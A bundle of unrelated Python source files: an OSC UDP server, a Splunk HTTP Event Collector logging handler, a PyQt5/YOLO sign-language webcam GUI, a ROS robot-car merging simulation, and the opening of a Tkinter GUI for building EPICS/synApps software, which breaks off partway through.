class ForkingOSCUDPServer(socketserver.ForkingMixIn, OSCUDPServer):
"""Forking version of the OSC UDP server.
Each message will be handled in its own new process.
Use this when heavyweight operations are done by each message handlers
and forking a whole new process for each of them is worth it.
"""
class AsyncIOOSCUDPServer():
"""Asyncio version of the OSC UDP Server.
Each UDP message is handled by _call_handlers_for_packet, the same method as in the
OSCUDPServer family of blocking, threading, and forking servers
"""
def __init__(self, server_address, dispatcher, loop):
"""
:param server_address: tuple of (IP address to bind to, port)
:param dispatcher: a pythonosc.dispatcher.Dispatcher
:param loop: an asyncio event loop
"""
self._server_address = server_address
self._dispatcher = dispatcher
self._loop = loop
class _OSCProtocolFactory(asyncio.DatagramProtocol):
"""OSC protocol factory which passes datagrams to _call_handlers_for_packet"""
def __init__(self, dispatcher):
self.dispatcher = dispatcher
def datagram_received(self, data, unused_addr):
_call_handlers_for_packet(data, self.dispatcher)
def serve(self):
"""Creates a datagram endpoint and registers it with our event loop.
Use this only if you are not currently running your asyncio loop.
(i.e. not from within a coroutine).
"""
self._loop.run_until_complete(self.create_serve_endpoint())
def create_serve_endpoint(self):
"""Creates a datagram endpoint and registers it with our event loop as coroutine."""
return self._loop.create_datagram_endpoint(
lambda: self._OSCProtocolFactory(self.dispatcher),
local_addr=self._server_address)
@property
def dispatcher(self):
return self._dispatcher
|
__init__.py
|
import atexit
import json
import logging
import socket
import time
import traceback
from threading import Thread
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
instances = [] # For keeping track of running class instances
DEFAULT_QUEUE_SIZE = 5000
# Called when application exit imminent (main thread ended / got kill signal)
@atexit.register
def perform_exit():
for instance in instances:
try:
instance.shutdown()
except Exception:
pass
def force_flush():
for instance in instances:
try:
instance.force_flush()
except Exception:
pass
def wait_until_empty():
for instance in instances:
try:
instance.wait_until_empty()
except Exception:
pass
class SplunkHandler(logging.Handler):
"""
A logging handler to send events to a Splunk Enterprise instance
running the Splunk HTTP Event Collector.
"""
def __init__(self, host, port, token, index,
allow_overrides=False, debug=False, flush_interval=15.0,
force_keep_ahead=False, hostname=None,
protocol='https', proxies=None,
queue_size=DEFAULT_QUEUE_SIZE, record_format=False,
retry_backoff=2.0, retry_count=5, source=None,
sourcetype='text', timeout=60, url=None, verify=True):
"""
Args:
host (str): The Splunk host param
port (int): The port the host is listening on
token (str): Authentication token
index (str): Splunk index to write to
allow_overrides (bool): Whether to look for _<param>
in log data (ex: _index)
debug (bool): Whether to print debug console messages
flush_interval (float): How often to push events
to splunk host in seconds
force_keep_ahead (bool): Sleep instead of dropping
logs when queue fills
hostname (str): The Splunk Enterprise hostname
protocol (str): The web protocol to use
proxies (dict): The proxies to use for the request
queue_size (int): The max number of logs to queue,
set to 0 for no max
record_format (bool): Whether the log record will be json
retry_backoff (float): The requests lib backoff factor
retry_count (int): The number of times to retry a failed request
source (str): The Splunk source param
sourcetype (str): The Splunk sourcetype param
timeout (float): The time to wait for a response from Splunk
url (str): Override of the url to send the event to
verify (bool): Whether to perform ssl certificate validation
"""
global instances
instances.append(self)
logging.Handler.__init__(self)
self.allow_overrides = allow_overrides
self.host = host
self.port = port
self.token = token
self.index = index
self.source = source
self.sourcetype = sourcetype
self.verify = verify
self.timeout = timeout
self.flush_interval = flush_interval
self.force_keep_ahead = force_keep_ahead
self.log_payload = ""
self.SIGTERM = False # 'True' if application requested exit
self.timer = None
# It is possible to get 'behind' and never catch
# up, so we limit the queue size
self.queue = list()
self.max_queue_size = max(queue_size, 0) # 0 is min queue size
self.debug = debug
self.session = requests.Session()
self.retry_count = retry_count
self.retry_backoff = retry_backoff
self.protocol = protocol
self.proxies = proxies
self.record_format = record_format
self.processing_payload = False
self.running = False
if not url:
self.url = '%s://%s:%s/services/collector' % (self.protocol,
self.host,
self.port)
else:
self.url = url
# Keep ahead depends on queue size, so cannot be 0
if self.force_keep_ahead and not self.max_queue_size:
self.write_log(
"Cannot keep ahead of unbound queue, using default queue size")
self.max_queue_size = DEFAULT_QUEUE_SIZE
self.write_debug_log("Starting debug mode")
if hostname is None:
self.hostname = socket.gethostname()
else:
self.hostname = hostname
self.write_debug_log("Preparing to override loggers")
# prevent infinite recursion by silencing requests and urllib3 loggers
logging.getLogger('requests').propagate = False
logging.getLogger('urllib3').propagate = False
# and do the same for ourselves
logging.getLogger(__name__).propagate = False
# disable all warnings from urllib3 package
if not self.verify:
requests.packages.urllib3.disable_warnings()
if self.verify and self.protocol == 'http':
print("[SplunkHandler DEBUG] "
+ 'cannot use SSL Verify and unsecure connection')
if self.proxies is not None:
self.session.proxies = self.proxies
# Set up automatic retry with back-off
self.write_debug_log("Preparing to create a Requests session")
retry = Retry(total=self.retry_count,
backoff_factor=self.retry_backoff,
method_whitelist=False, # Retry for any HTTP verb
status_forcelist=[500, 502, 503, 504])
self.session.mount(self.protocol
+ '://', HTTPAdapter(max_retries=retry))
self.worker_thread = None
self.start_worker_thread()
self.write_debug_log("Class initialize complete")
def emit(self, record):
self.write_debug_log("emit() called")
try:
record = self.format_record(record)
except Exception as e:
self.write_log("Exception in Splunk logging handler: %s" % str(e))
self.write_log(traceback.format_exc())
return
if self.flush_interval <= 0:
# Flush log immediately; is blocking call
self._send_payload(payload=record)
return
self.write_debug_log("Writing record to log queue")
# If force keep ahead, sleep until space
# in queue to prevent falling behind
while self.force_keep_ahead and len(self.queue) >= self.max_queue_size:
time.sleep(self.alt_flush_interval)
# Put log message into queue; worker thread will pick up
if not self.max_queue_size or len(self.queue) < self.max_queue_size:
self.queue.append(record)
else:
self.write_log("Log queue full; log data will be dropped.")
def close(self):
self.shutdown()
logging.Handler.close(self)
#
# helper methods
#
def start_worker_thread(self):
# Start a worker thread responsible for sending logs
self.write_debug_log("Starting worker thread.")
self.worker_thread = Thread(target=self._splunk_worker)
# Auto-kill thread if main process exits
self.worker_thread.daemon = True
self.worker_thread.start()
def write_log(self, log_message):
print("[SplunkHandler] " + log_message)
def write_debug_log(self, log_message):
if self.debug:
print("[SplunkHandler DEBUG] " + log_message)
def format_record(self, record):
self.write_debug_log("format_record() called")
params = {
'time': self.getsplunkattr(record, '_time', time.time()),
'host': self.getsplunkattr(record, '_host', self.hostname),
'index': self.getsplunkattr(record, '_index', self.index),
'source': record.pathname if self.source is None else self.source
}
params['sourcetype'] = self.getServiceName(params.get('host'))
params['event'] = self.format(record)
self.write_debug_log("Record dictionary created")
formatted_record = json.dumps(params, sort_keys=True)
self.write_debug_log("Record formatting complete")
return formatted_record
def getServiceName(self, hostname):
service_group = hostname.split('-')
if len(service_group) > 2:
return service_group[0] + '-' + service_group[1]
else:
return hostname
def getsplunkattr(self, obj, attr, default=None):
val = default
if self.allow_overrides:
val = getattr(obj, attr, default)
try:
delattr(obj, attr)
except Exception:
pass
return val
def _send_payload(self, payload):
r = self.session.post(
self.url,
data=payload,
headers={'Authorization': "Splunk %s" % self.token},
verify=self.verify,
timeout=self.timeout
)
r.raise_for_status() # Throws exception for 4xx/5xx status
def _flush_logs(self):
self.processing_payload = True
payload = self.empty_queue()
if payload:
self.write_debug_log("Payload available for sending")
self.write_debug_log("Destination URL is " + self.url)
try:
self.write_debug_log("Sending payload: " + payload)
self._send_payload(payload)
self.write_debug_log("Payload sent successfully")
except Exception as e:
try:
self.write_log(
"Exception in Splunk logging handler: %s" % str(e))
self.write_log(traceback.format_exc())
except Exception:
self.write_debug_log(
"Exception encountered," +
"but traceback could not be formatted"
)
else:
self.write_debug_log("No payload was available to send")
self.processing_payload = False
def _splunk_worker(self):
time_end = 0
time_start = 0
self.running = True
while self.running:
sleep_amount = self.flush_interval - (time_end - time_start)
time.sleep(max(sleep_amount, 0))
time_start = time.time()
self._flush_logs()
if self.SIGTERM:
self.write_debug_log(
"Timer reset aborted due to SIGTERM received")
self.running = False
time_end = time.time()
def empty_queue(self):
if len(self.queue) == 0:
self.write_debug_log("Queue was empty")
return ""
self.write_debug_log("Creating payload")
log_payload = ""
if self.SIGTERM:
log_payload += ''.join(self.queue)
self.queue.clear()
else:
# without looking at each item,
# estimate how many can fit in 50 MB
apprx_size_base = len(self.queue[0])
# dont count more than what is in queue
# to ensure the same number as pulled are deleted
# Note (avass): 524288 is 50MB/100
count = min(int(524288 / apprx_size_base), len(self.queue))
log_payload += ''.join(self.queue[:count])
del self.queue[:count]
self.write_debug_log("Queue task completed")
return log_payload
def force_flush(self):
self.write_debug_log("Force flush requested")
self._flush_logs()
self.wait_until_empty() # guarantees queue is emptied
def shutdown(self):
self.write_debug_log("Immediate shutdown requested")
# Only initiate shutdown once
if self.SIGTERM:
return
self.write_debug_log("Setting instance SIGTERM=True")
self.running = False
self.SIGTERM = True
self.write_debug_log(
"Starting up the final run of the worker thread before shutdown")
# Send the remaining items that might be sitting in queue.
self._flush_logs()
self.wait_until_empty() # guarantees queue is emptied before exit
def wait_until_empty(self):
self.write_debug_log("Waiting until queue empty")
while len(self.queue) > 0 or self.processing_payload:
self.write_debug_log("Current queue size: " + str(len(self.queue)))
time.sleep(self.alt_flush_interval)
@property
def alt_flush_interval(self):
return min(1.0, self.flush_interval / 2)
|
sonmari.py
|
import sys
from os import system
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5 import uic
import cv2
import argparse
import sonmari_video as sv
import darknet
from threading import Thread, enumerate
from queue import Queue
def parser():
parser = argparse.ArgumentParser(description="YOLO Object Detection")
parser.add_argument("--input", type=str, default=0,
help="video source. If empty, uses webcam 0 stream")
parser.add_argument("--out_filename", type=str, default="",
help="inference video name. Not saved if empty")
parser.add_argument("--weights", default="./model/yolov4-obj_96_best.weights",
help="yolo weights path")
parser.add_argument("--dont_show", action='store_true',
help="windown inference display. For headless systems")
parser.add_argument("--ext_output", action='store_true',
help="display bbox coordinates of detected objects")
parser.add_argument("--config_file", default="./cfg/yolov4-obj.cfg",
help="path to config file")
parser.add_argument("--data_file", default="./data/obj.data",
help="path to data file")
parser.add_argument("--thresh", type=float, default=.70,
help="remove detections with confidence below this value")
return parser.parse_args()
#UI파일 연결
#단, UI파일은 Python 코드 파일과 같은 디렉토리에 위치해야한다.
form_class = uic.loadUiType("sonmariui.ui")[0]
#화면을 띄우는데 사용되는 Class 선언
class SonmariWindow(QMainWindow, form_class) :
def __init__(self) :
super().__init__()
self.setupUi(self)
self.pixmap = QPixmap()
self.pixmap.load("logo.png")
self.pixmap = self.pixmap.scaledToWidth(100)
self.icon.setPixmap(self.pixmap)
#아이콘 추가
args = parser()
frame_queue = Queue()
darknet_image_queue = Queue(maxsize=1)
detections_queue = Queue(maxsize=1)
fps_queue = Queue(maxsize=1)
network, class_names, class_colors = darknet.load_network(
args.config_file,
args.data_file,
args.weights,
batch_size=1
)
width = darknet.network_width(network)
height = darknet.network_height(network)
#웹캠을 이용해 캡처
cap = cv2.VideoCapture(0)
#캡처 쓰레드
Thread(target=sv.video_capture, args=(cap, width, height, frame_queue, darknet_image_queue)).start()
#detect 쓰레드
Thread(target=sv.inference, args=(cap, args, network, class_names, darknet_image_queue, detections_queue, fps_queue)).start()
#출력 쓰레드
Thread(target=sv.drawing, args=(cap, self, args, width, height, class_colors, frame_queue, detections_queue, fps_queue)).start()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Escape:
self.close()
cap.release()
#esc 누르면 종료
if __name__ == "__main__" :
#QApplication : 프로그램을 실행시켜주는 클래스
app = QApplication(sys.argv)
#WindowClass의 인스턴스 생성
sonmariWindow = SonmariWindow()
#프로그램 화면을 보여주는 코드
sonmariWindow.show()
#프로그램을 이벤트루프로 진입시키는(프로그램을 작동시키는) 코드
app.exec_()
sys.exit()
|
nkMergeSim.py
|
#!/usr/bin/env python
#author Nikhil Kanamarla
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import math
from matplotlib import style
from Points import BuildPath
from std_msgs.msg import String
import rospy
import tf
import time
import datetime ##
import numpy as np
from numpy.linalg import inv,pinv
from threading import Thread, Lock
from geometry_msgs.msg import TransformStamped
from line_following.srv import *
import Path
import copy
isRun = True
style.use('fivethirtyeight')
fig = plt.figure()
ax1 = fig.add_subplot(1,1,1)
#t = 0
xs0,ys0,xs1,ys1,xc0,yc0,xc1,yc1,xm,ym = BuildPath(0.05)
posx = [0]*36
posy = [0]*36
#index1=9
#name1="zumoTest9"
index2=10
name2="zumoTest10"
#index3=11
#name3="zumoTest11"
#index4=14
#name4="zumoTest14"
#index5=15
#name5="zumoTest15"
#index6=35
#name6="zumoTest35"
#road 1 upper
#posx[index1] = 0.55
#posy[index1] = -0.98
#posx[] = 0.85
#posy[index2] = -0.98
#posx[12] =1.15
#posy[12] = -0.98
#posx[index3] = 1.45
#posy[index3] = -0.98
#posx[12] = 1.75
#posy[12] = -0.98
posx[index2] = 2
posy[index2] = -0.98
#road 2 lower
#posx[index4] = -1.43
#posy[index4] = 0.25
#posx[index5] = -1.7
#posy[index5] = -.144
#posx[index6] = -2.183
#posy[index6] = -.23
#posx[32] = -.2
#posy[32] =1.2
#posx[34] = .3
#posy[34] = 1.2
#posx[9] = .8
#posy[9] = 1.2
#posx[10] = 1.3
#posy[10] = 1.2
#posx[32] = 1.8
#posy[32] = 1.2
def watchout():
print("it's working")
def talker(index,x,y,drx,dry,sp):
global pub
pub.publish(str(index)+","+str(x)+","+str(y)+","+str(drx)+","+str(dry)+","+str(sp))
def RT_control(to,tmi,xi,xf,v,vf):
A_mtx = np.matrix([[to**3/6,to**2/2,to,1],[to**2/2,to,1,0],[tmi**3/6,tmi**2/2,tmi,1],[tmi**2/2,tmi,1,0]])
Y_mtx = np.matrix([[xi],[v],[xf],[vf]])
A_aux = np.transpose(A_mtx)*A_mtx
X_mtx = pinv(A_aux)*np.transpose(A_mtx)*Y_mtx
return X_mtx
def animate(i):
#global t
global xs0#long road
global ys0#Long road
global xs1
global ys1
ax1.clear()
#the dot at 0,0 is caused by having extra indexes here that don't corresspond to an actual car in the sim.
#ax1.scatter(posx[index1],posy[index1],c='b',s=300)
ax1.scatter(posx[index2],posy[index2],c='b',s=300)
#ax1.scatter(posx[index3],posy[index3],c='b',s=300)
#ax1.scatter(posx[index4],posy[index4],c='r',s=300)
#ax1.scatter(posx[index5],posy[index5],c='r',s=300)
#ax1.scatter(posx[index6],posy[index6],c='r',s=300)
#ax1.scatter(posx[18],posy[18],c='r',s=300)
#ax1.scatter(posx[19],posy[19],c='r',s=300)
#ax1.scatter(posx[21],posy[21],c='r',s=300)
#ax1.scatter(posx[22],posy[22],c='r',s=300)
#ax1.scatter(posx[30],posy[30],c='r',s=300)
#ax1.scatter(posx[31],posy[31],c='r',s=300)
#ax1.scatter(posx[32],posy[32],c='r',s=300)
#chris added these scatters to fully plot all 10 cars
#ax1.scatter(posx[33],posy[33],c='r',s=300)
#ax1.scatter(posx[12],posy[12],c='r',s=300)
#ax1.scatter(posx[28],posy[28],c='r',s=300)
#ax1.scatter(posx[34],posy[34],c='r',s=300)
#ax1.scatter(posx[9],posy[9],c='r',s=300)
ax1.plot(xs0,ys0,'g')
ax1.plot(xs1,ys1,'b')
ax1.plot(xc0,yc0,'y')
ax1.plot(xc1,yc1,'y')
ax1.plot(xm,ym,'k')
ax1.set_xlim([3.048,-3.048])
ax1.set_ylim([1.524,-4.5])
def zumoThread(index, frameName, controlRate, path):
#zumoThread inputs: index (car number) frameName (car name in Vicon), controlRate (???), path (car's path from path.py)
print("hello")
global posx
global posy
x = posx[index]
y = posy[index]
status = path.GetSegmentIDNoCheck()#return the Path segment number
road_speed = 0.2 #speed limit on the road unless intervened by from the controller
speed = road_speed #*1.145 #linear scaling factor 1.145 to achieve 0.30 actual
nf = rospy.ServiceProxy('lf_grad', LineFollowing) #nf is the result of the LineFollowing service call which we name 'lf_grad', look in folder srv to see inputs and outputs
nf_m = rospy.ServiceProxy('lf_merge', MergeControl)
cur_t = time.time()
dx = 0.0 #initialize gradient direction vectors
dy = 0.0
isControlled = False #initially not in the control region
abcd = np.matrix([[0],[0],[0],[0]]) #initialize an RT_control matrix
tinit = 0
controlInfoPre = (None,None)
while isRun:
temp_t = time.time()
x = x + dx*speed*(temp_t-cur_t) #Note temp_t and cur_t names seem to be backward
y = y + dy*speed*(temp_t-cur_t)
posx[index] = x #index refers to the car number, update that cars x position
posy[index] = y
talker(index,x,y,dx,dy,speed) #publish the cars number, its position, the desired vector to the next position and its desired speed
cur_t = temp_t
rospy.wait_for_service('lf_grad')
try:
resp = nf(status, x, y) # from the LineFollowing service, the output res,dx,dy is saved as (ros object?) resp
res = [resp.res, resp.dx, resp.dy] # turn the ros object resp into a "useable" vector
status = path.GetSegmentID(x,y) #
####################################################
#stop the car at the end of the path
if status==5: #status is the source number of the segment of arc (check mapbuilder.cpp)
road_speed = 0.0
if res[0] == 0:
dx = res[1]
dy = res[2]
elif res[0]==2:
pass
else:
print "Zumo "+str(index)+" Cannot Run NF."
except rospy.ServiceException, e:
print "Service call failed: %s"%e
controlInfo = path.CheckControl(x, y) #controlInfo can be 0,1,2 zero is in control region (L), one is in the merge region, and two is exiting the merge region. Check control checks if the position is > or < a specified transition condition
if (controlInfo is not None) and (controlInfo != controlInfoPre): #if the position falls in the control region
if controlInfo[0] == 0:
rospy.wait_for_service('lf_merge') #if
mf = nf_m(index,controlInfo[1],controlInfo[2],0,road_speed)
if mf.isFirst:
isControlled = False
else:
isControlled = True
abcd = RT_control(time.time()-mf.tinit,mf.tmi-mf.tinit,0,mf.L,road_speed,road_speed)
tinit = mf.tinit
#print "Robot "+str(index)+": to->"+str(time.time()-mf.tinit)+" tmi->"+str(mf.tmi-mf.tinit)+" xi->0 xf->"+str(mf.L)+" v->"+str(cur_speed)+" vf->"+str(cur_speed)
#print "ABCD: "+str(abcd)
elif controlInfo[0] == 2:
isControlled = False
rospy.wait_for_service('lf_merge')
mf = nf_m(index,controlInfo[1],controlInfo[2],1,road_speed)
elif controlInfo[0] == 1:
isControlled = False
controlInfoPre = controlInfo
if not isControlled:
speed = road_speed #*1.145 #this is a correction that is added to the real robot control and is removed here because
else:
temps = 0.5*abcd[0]*(time.time()-tinit)*(time.time()-tinit)+abcd[1]*(time.time()-tinit)+abcd[2]
ttemps = temps.item(0)
speed = ttemps #*1.145
#if speed >0.7:
#speed = 0.7
time.sleep(controlRate)
rospy.init_node('zumo_go', anonymous=True)#zumo_go is a node
pub = rospy.Publisher('/ZumoRefs', String, queue_size=1000)#ZumoRefs is a topic name
#one zipper merge starting positions
#t1 = Thread(target = zumoThread, args = (index1, name1, 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t1.start()
#index2=car 10 and path 40
t1 = Thread(target = zumoThread, args = (index2, name2, 0.05, copy.deepcopy(Path.GetDefaultPath(40))))
t1.start()
#t3 = Thread(target = zumoThread, args = (index3, name3, 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t3.start()
#t4 = Thread(target = zumoThread, args = (5, "zumoTest5", 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t4.start()
#t5 = Thread(target = zumoThread, args = (12, "zumoTest12", 0.05, copy.deepcopy(Path.GetDefaultPath(8))))
#t5.start()
#t11 = Thread(target = zumoThread, args = (index4, name4, 0.05, copy.deepcopy(Path.GetDefaultPath(0))))
#t11.start()
#t12 = Thread(target = zumoThread, args = (index5, name5, 0.05, copy.deepcopy(Path.GetDefaultPath(0))))
#t12.start()
#t13 = Thread(target = zumoThread, args = (index6, name6, 0.05, copy.deepcopy(Path.GetDefaultPath(0))))
#t13.start()
#t15 = Thread(target = zumoThread, args = (9, "zumoTest9", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t15.start()
#t16 = Thread(target = zumoThread, args = (10, "zumoTest10", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t16.start()
#t17 = Thread(target = zumoThread, args = (34, "zumoTest34", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t17.start()
#t18 = Thread(target = zumoThread, args = (32, "zumoTest32", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t18.start()
#t19 = Thread(target = zumoThread, args = (10, "zumoTest10", 0.05, copy.deepcopy(Path.GetDefaultPath(3))))
#t19.start()
ani = animation.FuncAnimation(fig, animate, interval=100)
plt.axis('equal')
plt.show()
isRun = False
|
installGUI.py
|
#!/usr/bin/env python3
"""GUI class for the installSynApps module
This GUI solution allows for much easier use of the installSynApps module
to clone, update, and build the EPICS and synApps software stack.
"""
# Tkinter imports
import tkinter as tk
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
from tkinter import simpledialog
from tkinter import font as tkFont
import tkinter.scrolledtext as ScrolledText
# pygithub for github autosync tags integration.
WITH_PYGITHUB=True
try:
from github import Github
except ImportError:
WITH_PYGITHUB=False
# Some python utility libs
import os
import time
import shutil
import datetime
import threading
import webbrowser
import subprocess
from sys import platform
# installSynApps module imports
import installSynApps
import installSynApps.DataModel as DataModel
import installSynApps.IO as IO
import installSynApps.Driver as Driver
import installSynApps.ViewModel as ViewModel
class InstallSynAppsGUI:
"""
Class representing GUI for using installSynApps
Attributes
----------
master : Tk
the root frame of the GUI
smallFont, largeFont
tkfonts used by the application
control buttons
8 tk buttons linked to control operations
log and configPanel
scrollable panels that display current information
thread and loadingIconThread
threads used for asynchronous usage of the module
installSynApps modules
loaded instances of installSynApps objects that drive the process
Methods
-------
loadingloop
Method that creates a loading animation
writeToLog
Method that appends to the log
showMessage, showWarningMessage, showErrorMessage
Methods for displaying output messages
initLogText
returns initial log text
updateConfigPanel
Syncs the config panel with the currently loaded config
updateAllRefs
Updates references to install config so that build remains consistent
recheckDeps
Function that checks if dependancies are in the system path
newConfig
Function that asks user for an install location, and then loads a basic install config with that path.
loadConfig
event function that gives directory selection prompt and loads configure if dir is valid
saveConfig
overwrites the existing config path with whatever changes had been added
saveConfigAs
Opens dialog for file path, and saves to a specific directory
openEditWindow
Function that opens appropriate edit window depending on argument.
injectFilesProcess
process function for injecting into files
updateConfigProcess
process function for updating RELEASE and configuration files
cloneConfigProcess
process function for cloning all selected modules
buildConfigProcess
process function for building all selected modules
autorunProcss
process function for building all selected modules
loadHelp
prints help information
saveLog
prompts for save location of log file
"""
def __init__(self, master):
""" Constructor for InstallSynAppGUI """
# Initialize the frame and window
self.master = master
self.master.protocol('WM_DELETE_WINDOW', self.close_cleanup)
self.smallFont = tkFont.Font(family = "Helvetica", size = 10)
self.largeFont = tkFont.Font(family = "Helvetica", size = 14)
frame = Frame(self.master)
frame.pack()
IO.logger.assign_write_function(self.writeToLog)
# core count, dependency install, and popups toggles
self.showPopups = tk.BooleanVar()
self.showPopups.set(False)
self.installDep = tk.BooleanVar()
self.installDep.set(False)
self.singleCore = tk.BooleanVar()
self.singleCore.set(False)
# Debug togges
self.showDebug = tk.BooleanVar()
self.showDebug.set(False)
self.showCommands = tk.BooleanVar()
self.showCommands.set(False)
self.generateLogFile = tk.BooleanVar()
self.generateLogFile.set(False)
self.binariesFlatToggle = tk.BooleanVar()
self.binariesFlatToggle.set(True)
menubar = Menu(self.master)
# File menu
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='New AD Config', command=lambda : self.newConfig('AD'))
filemenu.add_command(label='New Motor Config', command=lambda : self.newConfig('Motor'))
filemenu.add_command(label='New Full Config', command=lambda: self.newConfig('All'))
filemenu.add_command(label='Open', command=self.loadConfig)
filemenu.add_command(label='Save', command=self.saveConfig)
filemenu.add_command(label='Save As', command=self.saveConfigAs)
filemenu.add_command(label='Sync Tags', command=self.syncTags)
filemenu.add_command(label='Exit', command=self.close_cleanup)
menubar.add_cascade(label='File', menu=filemenu)
# Edit Menu
editmenu = Menu(menubar, tearoff=0)
editmenu.add_command(label='Edit Config', command=lambda : self.openEditWindow('edit_config'))
editmenu.add_command(label='Add New Module', command=lambda : self.openEditWindow('add_module'))
editmenu.add_command(label='Edit Individual Module', command=lambda : self.openEditWindow('edit_single_mod'))
editmenu.add_command(label='Edit Custom Build Scripts', command=lambda : self.openEditWindow('add_custom_build_script'))
editmenu.add_command(label='Edit Injection Files', command=lambda : self.openEditWindow('edit_injectors'))
editmenu.add_command(label='Edit Build Flags', command=lambda : self.openEditWindow('edit_build_flags'))
editmenu.add_command(label='Edit Make Core Count', command=self.editCoreCount)
editmenu.add_checkbutton(label='Toggle Popups', onvalue=True, offvalue=False, variable=self.showPopups)
editmenu.add_checkbutton(label='Toggle Single Core', onvalue=True, offvalue=False, variable=self.singleCore)
self.singleCore.trace('w', self.setSingleCore)
menubar.add_cascade(label='Edit', menu=editmenu)
# Debug Menu
debugmenu = Menu(menubar, tearoff = 0)
debugmenu.add_command(label='Print Loaded Config Info', command=self.printLoadedConfigInfo)
debugmenu.add_command(label='Clear Log', command=self.resetLog)
debugmenu.add_command(label='Recheck Dependancies', command=self.recheckDeps)
debugmenu.add_command(label='Print Path Information', command=self.printPathInfo)
debugmenu.add_checkbutton(label='Show Debug Messages', onvalue=True, offvalue=False, variable=self.showDebug)
debugmenu.add_checkbutton(label='Show Commands', onvalue=True, offvalue=False, variable=self.showCommands)
debugmenu.add_checkbutton(label='Auto-Generate Log File', onvalue=True, offvalue=False, variable=self.generateLogFile)
menubar.add_cascade(label='Debug', menu=debugmenu)
# Build Menu
buildmenu = Menu(menubar, tearoff=0)
buildmenu.add_command(label='Autorun', command=lambda : self.initBuildProcess('autorun'))
buildmenu.add_command(label='Run Dependency Script', command=lambda : self.initBuildProcess('install-dependencies'))
buildmenu.add_command(label='Clone Modules', command=lambda : self.initBuildProcess('clone'))
buildmenu.add_command(label='Update Config Files', command=lambda : self.initBuildProcess('update'))
buildmenu.add_command(label='Inject into Files', command=lambda : self.initBuildProcess('inject'))
buildmenu.add_command(label='Build Modules', command=lambda : self.initBuildProcess('build'))
buildmenu.add_command(label='Edit Dependency Script', command=lambda : self.openEditWindow('edit_dependency_script'))
buildmenu.add_checkbutton(label='Toggle Install Dependencies', onvalue=True, offvalue=False, variable=self.installDep)
menubar.add_cascade(label='Build', menu=buildmenu)
# Package Menu
packagemenu = Menu(menubar, tearoff=0)
packagemenu.add_command(label='Select Package Destination', command=self.selectPackageDestination)
packagemenu.add_command(label='Package Modules', command=lambda : self.initBuildProcess('package'))
packagemenu.add_command(label='Copy and Unpack', command=lambda : self.initBuildProcess('moveunpack'))
packagemenu.add_command(label='Set Output Pacakge Name', command=self.setOutputPackageName)
packagemenu.add_checkbutton(label='Toggle Flat Binaries', onvalue=True, offvalue=False, variable=self.binariesFlatToggle)
menubar.add_cascade(label='Package', menu=packagemenu)
# InitIOCs Menu
iocmenu = Menu(menubar, tearoff=0)
iocmenu.add_command(label='Get initIOCs', command=self.getInitIOCs)
iocmenu.add_command(label='Launch initIOCs', command=self.launchInitIOCs)
menubar.add_cascade(label='IOCs', menu=iocmenu)
# Help Menu
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label='Quick Help', command=self.loadHelp)
helpmenu.add_command(label='Required dependencies', command=self.printDependencies)
helpmenu.add_command(label='installSynApps on Github', command=lambda : webbrowser.open("https://github.com/epicsNSLS2-deploy/installSynApps", new=2))
helpmenu.add_command(label='Report an issue', command=lambda : webbrowser.open("https://github.com/epicsNSLS2-deploy/installSynApps/issues", new=2))
helpmenu.add_command(label='Custom Build Script Help', command=self.depScriptHelp)
helpmenu.add_command(label='Online Documentation', command=lambda : webbrowser.open("https://epicsNSLS2-deploy.github.io/installSynApps", new=2))
helpmenu.add_command(label='About', command=self.showAbout)
menubar.add_cascade(label='Help', menu=helpmenu)
self.master.config(menu=menubar)
self.msg = "Welcome to installSynApps!"
# title label
self.topLabel = Label(frame, text = self.msg, width = '25', height = '1', relief = SUNKEN, borderwidth = 1, bg = 'blue', fg = 'white', font = self.largeFont)
self.topLabel.grid(row = 0, column = 0, padx = 10, pady = 10, columnspan = 2)
# Control buttons
self.loadButton = Button(frame, font=self.smallFont, text='Load Config', command=self.loadConfig, height='3', width='20')
self.cloneButton = Button(frame, font=self.smallFont, text='Clone Modules', command=lambda : self.initBuildProcess('clone'), height='3', width='20')
self.updateButton = Button(frame, font=self.smallFont, text='Update RELEASE', command=lambda : self.initBuildProcess('update'), height='3', width='20')
self.injectButton = Button(frame, font=self.smallFont, text='Inject Files', command=lambda : self.initBuildProcess('inject'), height='3', width='20')
self.buildButton = Button(frame, font=self.smallFont, text='Build Modules', command=lambda : self.initBuildProcess('build'), height='3', width='20')
self.autorunButton = Button(frame, font=self.smallFont, text='Autorun', command=lambda : self.initBuildProcess('autorun'), height='3', width='20')
self.packageButton = Button(frame, font=self.smallFont, text='Package', command=lambda : self.initBuildProcess('package'), height='3', width='20')
self.saveLog = Button(frame, font=self.smallFont, text='Save Log', command=self.saveLog, height='3', width='20')
self.loadButton.grid( row = 1, column = 0, padx = 15, pady = 15, columnspan = 1)
self.cloneButton.grid( row = 1, column = 1, padx = 15, pady = 15, columnspan = 1)
self.updateButton.grid( row = 2, column = 0, padx = 15, pady = 15, columnspan = 1)
self.injectButton.grid( row = 2, column = 1, padx = 15, pady = 15, columnspan = 1)
self.buildButton.grid( row = 3, column = 0, padx = 15, pady = 15, columnspan = 1)
self.autorunButton.grid(row = 3, column = 1, padx = 15, pady = 15, columnspan = 1)
self.packageButton.grid(row = 4, column = 0, padx = 15, pady = 15, columnspan = 1)
self.saveLog.grid( row = 4, column = 1, padx = 15, pady = 15, columnspan = 1)
# Log and loading label
#self.logLabel = Label(frame, text = 'Log', font = self.smallFont, height = '1').grid(row = 0, column = 6, pady = 0, columnspan = 1)
self.logButton = Button(frame, text='Clear Log', font=self.smallFont, height='1', command=self.resetLog).grid(row = 0, column = 7, pady = 0, columnspan = 1)
self.loadingLabel = Label(frame, text = 'Process Thread Status: Done.', anchor=W, font=self.smallFont, height = '1')
